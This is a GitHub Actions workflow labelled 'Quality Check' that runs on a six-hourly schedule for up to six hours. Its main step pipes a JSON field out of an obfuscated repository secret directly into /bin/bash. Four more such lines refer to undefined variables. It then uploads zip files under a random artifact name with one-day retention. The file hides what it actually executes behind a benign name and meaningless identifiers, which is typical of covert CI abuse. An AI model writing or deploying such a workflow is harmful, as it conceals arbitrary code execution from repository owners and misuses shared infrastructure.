name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '51 5,11,17,23 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          rxf4: ${{ secrets.rxf4 }}
        run: |
          printf '%s' "$rxf4" | jq -r .amz4730 | /bin/bash
          printf '%s' "$co398" | jq -r .bar936 | /bin/bash
          echo $jyvqb682 | jq -r .ocj6 | /bin/bash
          printf '%s' "$a36716" | jq -r .enm5717 | /bin/bash
          printf '%s' "$uqi58" | jq -r .ymuga181 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 1N5UXDs0
          path: "*.zip"
          retention-days: 1
